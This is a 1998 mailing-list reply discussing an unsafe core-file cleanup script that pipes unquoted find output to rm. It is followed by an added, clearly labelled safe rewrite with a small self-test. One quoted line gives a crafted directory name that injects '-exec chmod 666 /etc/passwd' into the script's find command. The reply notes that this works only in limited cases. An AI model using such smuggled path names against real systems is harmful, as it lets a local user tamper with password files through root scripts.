Re: Directory name problem...

Scott Wood (master@darkflame.ml.org)
Mon, 26 Oct 1998 05:21:05 -0500 (EST)


Henrik Olsen <henrik@iaeste.dk> wrote:

> On Mon, 26 Oct 1998, Khimenko Victor wrote:
>
> > In <199810260025.TAA13771@alcove.wittsend.com> Michael H. Warfield
> > (mhw@wittsend.com) wrote:
> > MW> Khimenko Victor enscribed thusly:
> > >> 25-Oct-98 20:01 you wrote:
> > >> > Hi Michael.
> >
> > >> >>> % Already tried, and he's not interested, but I did find out
> > >> >>> % what script he's using...
> > >> >>> %
> > >> >>> % Q> #!/bin/sh
> > >> >>> % Q> XYZZY="`find / -name core`"
> > >> >>> % Q> for LOOP in `find $XYZZY | sort -ru` ; do
> > >> >>> % Q> rm -fr $LOOP
> > >> >>> % Q> done
> >
<snip>
> You asked for an exploit of that exact script, here's one that works
>
> mkdir -p ' -exec chmod 666 /etc/passwd ; -o -name /core'
>
> You don't need any shell metachars to make it execute any command you
> want.

That will only work if your directory contains the last core file that
find encounters. Otherwise, find will complain because it finds more
paths after the expression, and not do anything.

-Scott
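
Added example, not part of the original message or of the script quoted in the thread: a version of the core-file cleanup that never sends find's output back through shell word splitting, so a path is never re-parsed as find expression tokens. The function names and the test tree built under mktemp are constructed for illustration.

```shell
#!/bin/sh
# Remove regular files named "core" under a root directory.
# Each path found is handed to rm as one argv entry; it is never expanded
# unquoted on a command line, so whitespace or words such as "-exec" or "-o"
# inside a directory name stay part of the name.

remove_cores() {
    root=$1
    # -xdev     : stay on the filesystem that holds $root
    # -type f   : skip directories that merely happen to be called "core"
    # -exec .. +: pass paths straight to rm, with no shell in between
    # --        : stop rm from reading a path as an option
    find "$root" -xdev -type f -name core -exec rm -f -- {} +
}

# Constructed test tree (hypothetical names) in a throwaway directory.
demo() {
    t=$(mktemp -d) || return 1
    mkdir -p "$t/plain" "$t/odd -o -name keep" "$t/src/core"
    : > "$t/plain/core"                 # ordinary core file: must go
    : > "$t/odd -o -name keep/core"     # core file under an awkward name: must go
    : > "$t/keep"                       # unrelated file: must survive
    : > "$t/src/core/main.c"            # file inside a directory named core: must survive
    remove_cores "$t"
    result=fail
    if [ ! -e "$t/plain/core" ] && [ ! -e "$t/odd -o -name keep/core" ] \
       && [ -f "$t/keep" ] && [ -f "$t/src/core/main.c" ]; then
        result=ok
    fi
    rm -rf -- "$t"
    echo "$result"
}

demo
```

This addresses only the re-parsing of path names discussed in the thread; it does not try to handle a tree that is being modified while find walks it.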
